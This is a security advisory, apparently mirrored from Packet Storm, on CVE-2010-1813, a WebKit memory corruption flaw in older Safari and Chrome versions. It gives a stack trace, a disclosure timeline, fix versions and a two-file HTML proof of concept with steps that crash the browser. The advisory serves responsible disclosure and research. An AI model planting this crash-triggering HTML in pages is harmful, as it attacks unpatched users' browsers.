Lucene search
K

Webkit Memory Corruption

🗓️ 11 Sep 2010 00:00:00Reported by Jose Antonio Vazquez GonzalezType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 54 Views

WEBKIT MEMORY CORRUPTION VULNERABILITY IN APPLE SAFARI & GOOGLE CHROM

Related
Code
`TITLE: WEBKIT (APPLE SAFARI < 4.1.2/5.0.2 & GOOGLE CHROME < 5.0.375.125) MEMORY CORRUPTION VULNERABILITY  
TESTED OS: WINDOWS XP SP3  
SEVERITY: HIGH  
CVE-NUMBER: CVE-2010-1813  
DISCOVERED DATE: 2010-06-29  
FIXED DATE: GOOGLE CHROME (2010-07-26) & APPLE SAFARI (2010-09-08)  
FIXED VERSIONS: GOOGLE CHROME 5.0.375.125 & APPLE SAFARI 4.1.2/5.0.2  
DISCOVERED BY: JOSE A. VAZQUEZ  
  
======ABOUT APPLICATION======  
  
"WebKit is an open source web browser engine. WebKit is also the name of the Mac OS X system framework version  
of the engine that's used by Safari, Dashboard, Mail, and many other OS X applications. WebKit's HTML and  
JavaScript code began as a branch of the KHTML and KJS libraries from KDE..." copied from http://webkit.org/  
  
======DESCRIPTION======  
  
A memory corruption vulnerability was confirmed by Chromium Security Team. Original stacktrace showed a null ptr  
dereference, but some pointers were also corrupted.  
  
Stacktrace (using Chrome symbols):  
  
WebCore::RenderObject::containingBlock() Line 597  
WebCore::RenderBlock::paintContinuationOutlines() Line 2344  
WebCore::RenderBlock::paintObject() Line 2232  
WebCore::RenderBlock::paint() Line 1980  
WebCore::RenderLayer::paintLayer() Line 2447  
WebCore::RenderLayer::paintList() Line 2499  
WebCore::RenderLayer::paintLayer() Line 2468  
WebCore::RenderLayer::paint() Line 2252  
WebCore::FrameView::paintContents() Line 1943  
WebCore::ScrollView::paint() Line 797  
WebCore::RenderWidget::paint() Line 281  
WebCore::InlineBox::paint() Line 180  
WebCore::InlineFlowBox::paint() Line 682  
WebCore::RootInlineBox::paint() Line 167  
WebCore::RenderLineBoxList::paint() Line 219  
WebCore::RenderBlock::paintContents() Line 2090  
WebCore::RenderBlock::paintObject() Line 2199  
WebCore::RenderBlock::paint() Line 1980  
WebCore::RenderBlock::paintChildren() Line 2127  
WebCore::RenderBlock::paintContents() Line 2092  
WebCore::RenderBlock::paintObject() Line 2199  
WebCore::RenderBlock::paint() Line 1980  
WebCore::RenderLayer::paintLayer() Line 2445  
WebCore::RenderLayer::paintList() Line 2499  
WebCore::RenderLayer::paintLayer() Line 2468  
WebCore::RenderLayer::paint() Line 2252  
WebCore::FrameView::paintContents() Line 1943  
WebCore::ScrollView::paint() Line 797  
WebKit::WebFrameImpl::paintWithContext() Line 1795  
WebKit::WebFrameImpl::paint() Line 1818  
WebKit::WebViewImpl::paint() Line 979  
RenderWidget::PaintRect() Line 390  
RenderWidget::DoDeferredUpdate() Line 501  
RenderWidget::CallDoDeferredUpdate() Line 428  
  
  
======PROOF OF CONCEPT======  
  
File 1.html:  
  
<meta http-equiv="refresh" content="1;URL=1.html" >  
<iframe src="2.html"></iframe>  
  
File 2.html:  
  
<dialog style='position:relative'>  
<h style='outline-style:auto'>X<div></div></h>  
</dialog>  
  
  
======STEPS TO REPRODUCE======  
  
1.- Upload 1.html and 2.html to your server.  
2.- Open file 1.html with vulnerable app.  
  
-Google Chrome:  
  
3.- Wait for a while, then, crash is got (sad-tab).  
  
-Apple Safari:  
  
3.- Wait for a while, if crash is not got, use Ctrl+T to trigger it.  
  
  
  
======REFERENCES======  
  
[ref-1] -> https://bugs.webkit.org/show_bug.cgi?id=41373  
[ref-2] -> http://googlechromereleases.blogspot.com/2010/07/stable-channel-update_26.html  
[ref-3] -> http://support.apple.com/kb/HT4334  
[ref-4] -> http://spa-s3c.blogspot.com/2010/09/full-responsible-disclosurewebkit-apple.html  
  
  
======DISCLOSURE TIMELINE======  
  
Standard Time Zone: GMT/UTC + 01:00 hour (Spain/Madrid)  
  
[2010-06-29] => Posted new issue in Chromium Project (with pocs).  
[2010-06-29] => Chromium confirmed memory corruption and opened new webkit bug.  
[2010-07-26] => Chromium released new fix (Google Chrome 5.0.375.125).  
[2010-09-08] => Apple released new fix (Apple Safari 4.1.2/5.0.2).  
[2010-09-10] => Public disclosure.  
  
  
======CREDITS=======  
  
Jose Antonio Vazquez Gonzalez,  
Telecom. Engineer & Sec. Researcher.  
http://spa-s3c.blogspot.com/  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Sep 2010 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.09691
54